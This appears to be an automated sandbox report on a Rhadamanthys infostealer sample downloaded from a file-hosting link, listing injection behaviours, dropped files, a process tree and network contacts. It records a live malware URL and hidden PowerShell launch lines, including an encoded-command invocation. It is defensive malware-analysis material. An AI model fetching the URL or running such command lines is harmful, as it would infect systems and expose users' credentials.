Analysis Overview
Threat Level: Known bad
The file https://www.up-4ever.net/f81xcrmamr72 was found to be: Known bad.
Malicious Activity Summary
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
Blocklisted process makes network request
Loads dropped DLL
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Program crash
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Modifies registry class
Suspicious use of SendNotifyMessage
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-11 08:42
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-11 08:42
Reported
2024-02-11 08:47
Platform
win10-20231215-en
Max time kernel
294s
Max time network
294s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 4288 created 3084 | N/A | C:\Windows\SysWOW64\explorer.exe | c:\windows\system32\sihost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm | \??\c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | \??\c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | \??\c:\windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs | \??\c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx | \??\c:\windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log | \??\c:\windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs | \??\c:\windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | \??\c:\windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | \??\c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp | \??\c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log | \??\c:\windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 1604 set thread context of 4288 | N/A | C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe | C:\Windows\SysWOW64\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\Installer\MSIC881.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID8B5.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Debug\ESE.TXT | \??\c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC98C.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC9BC.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICA79.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{5DB33E67-8118-4AE0-A414-6B7A0AC6AB7A} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5ac808.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5ac804.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5ac804.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICA3A.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICB17.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID74D.tmp | C:\Windows\system32\msiexec.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
Enumerates system info in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133521145605244619" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "51200" | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
| N/A | N/A | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.up-4ever.net/f81xcrmamr72
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff86f979758,0x7ff86f979768,0x7ff86f979778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2864 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2860 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2036 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1516 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
c:\windows\system32\sihost.exe
sihost.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4640 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4844 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5356 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5836 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3796 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4952 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=768 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4948 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2904 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:2
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\your_files\password.jpg" /ForceBootstrapPaint3D
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\your_files\password.jpg" /ForceBootstrapPaint3D
\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DsSvc
C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe
"C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe" -ServerName:Microsoft.MSPaint.AppX437q68k2qc2asvaagas2prv9tjej6ja9.mca
C:\Users\Admin\Downloads\your_files\setup\setup.exe
"C:\Users\Admin\Downloads\your_files\setup\setup.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding DC89B66988FA4B04CEC0520C89FCD9D3 C
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\installer.msi" AI_SETUPEXEPATH=C:\Users\Admin\Downloads\your_files\setup\setup.exe SETUPEXEDIR=C:\Users\Admin\Downloads\your_files\setup\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1707400341 " AI_EUIMSI=""
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E70F789581D10F3FA049E68B56022B52
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssCB72.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiCB6F.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrCB70.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrCB71.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe
"C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe"
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e [base64-encoded command not captured in this extract]
C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe"
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 1888
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 1956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 1968
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | www.up-4ever.net | udp |
| US | 172.67.216.188:443 | www.up-4ever.net | tcp |
| US | 172.67.216.188:443 | www.up-4ever.net | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 172.67.216.188:443 | www.up-4ever.net | udp |
| GB | 172.217.16.238:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.180.2:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | ae01.alicdn.com | udp |
| US | 8.8.8.8:53 | dt.betoyanracks.com | udp |
| NL | 23.109.170.34:443 | dt.betoyanracks.com | tcp |
| GB | 172.217.16.238:443 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.180.2:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 188.216.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.170.109.23.in-addr.arpa | udp |
| GB | 79.133.176.252:443 | ae01.alicdn.com | tcp |
| US | 8.8.8.8:53 | gigjjgb.com | udp |
| US | 104.21.69.201:443 | gigjjgb.com | tcp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | lh3.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| GB | 172.217.16.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 216.239.32.36:443 | region1.analytics.google.com | tcp |
| BE | 64.233.184.157:443 | stats.g.doubleclick.net | tcp |
| GB | 216.58.204.67:443 | www.google.co.uk | tcp |
| US | 104.21.69.201:443 | gigjjgb.com | udp |
| US | 8.8.8.8:53 | tvkaimh.com | udp |
| US | 8.8.8.8:53 | youradexchange.com | udp |
| US | 104.21.91.188:443 | youradexchange.com | tcp |
| US | 8.8.8.8:53 | pubtrky.com | udp |
| US | 8.8.8.8:53 | ctrtrk.com | udp |
| US | 172.67.204.62:443 | ctrtrk.com | tcp |
| US | 104.21.8.108:443 | pubtrky.com | tcp |
| US | 8.8.8.8:53 | 252.176.133.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.69.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.184.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
